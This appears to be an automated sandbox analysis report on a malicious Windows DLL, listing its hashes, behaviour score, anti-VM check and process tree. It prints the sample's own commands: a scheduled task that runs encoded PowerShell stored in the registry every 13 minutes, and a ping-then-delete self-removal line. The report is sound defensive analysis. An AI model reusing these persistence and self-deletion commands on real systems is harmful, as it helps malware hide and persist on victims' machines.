feef7c585a67e368ce1a514158d6abc280e502b0408ad8b589d83687360ff11f

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230621-en
resource tags

arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2023 21:59

Target

443c727f45873a83f2b236cafa7781439e0ce9a25120d01621a812af15934ffd.dll
Size

18KB
MD5

8bc27fd9c49426a50ebc2d55e84a2ab6
SHA1

15c5ff436d2f663ff90f6e194c6b397be35952e9
SHA256

443c727f45873a83f2b236cafa7781439e0ce9a25120d01621a812af15934ffd
SHA512

6bf54dd10d675f97570789231764b38e3b641669e4f55b47074715ff7a7e5cdb47fe8282438f01e153a293278dec994ea3651e9c7681f0654dfcfba09875f34e
SSDEEP

192:Y7z0+lD+GrfDtmiQe9XzDQOrueD2ra7oSCEPhQs8WOQUbS3TwaARqRCfaU5MW:vmjDs2dBHqra7oSjMvIwveCfaU5v

Score

9^/10

evasion

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

rundll32.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rundll32.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1920 schtasks.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

8 PING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rundll32.exe

pid	process
1920	schtasks.exe

pid	process
8	PING.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

rundll32.exerundll32.execmd.exe

description	pid	process	target process
PID 2664 wrote to memory of 2832	2664	rundll32.exe	rundll32.exe
PID 2664 wrote to memory of 2832	2664	rundll32.exe	rundll32.exe
PID 2664 wrote to memory of 2832	2664	rundll32.exe	rundll32.exe
PID 2832 wrote to memory of 1920	2832	rundll32.exe	schtasks.exe
PID 2832 wrote to memory of 1920	2832	rundll32.exe	schtasks.exe
PID 2832 wrote to memory of 1920	2832	rundll32.exe	schtasks.exe
PID 2832 wrote to memory of 364	2832	rundll32.exe	cmd.exe
PID 2832 wrote to memory of 364	2832	rundll32.exe	cmd.exe
PID 2832 wrote to memory of 364	2832	rundll32.exe	cmd.exe
PID 364 wrote to memory of 8	364	cmd.exe	PING.EXE
PID 364 wrote to memory of 8	364	cmd.exe	PING.EXE
PID 364 wrote to memory of 8	364	cmd.exe	PING.EXE

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\443c727f45873a83f2b236cafa7781439e0ce9a25120d01621a812af15934ffd.dll, DllRegisterServer
1⤵
- Suspicious use of WriteProcessMemory
PID:2664
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\443c727f45873a83f2b236cafa7781439e0ce9a25120d01621a812af15934ffd.dll, DllRegisterServer
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /F /TN "{8B30B3CD-2068-4F75-AB1F-FCAE6AF928B6}" /TR " cmd /q /c start /min \"\" powershell \"$nonresistantOutlivesDictatorial = Get-ItemProperty -Path HKCU:\Software\nonresistantOutlivesDictatorial; powershell -encodedcommand $nonresistantOutlivesDictatorial.AphroniaHaimavati \"" /SC MINUTE /MO 13
    3⤵
    - Creates scheduled task(s)
    PID:1920
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C "ping localhost && DEL /F /S /Q /A C:\Users\Admin\AppData\Local\Temp\443c727f45873a83f2b236cafa7781439e0ce9a25120d01621a812af15934ffd.dll"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:364
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:8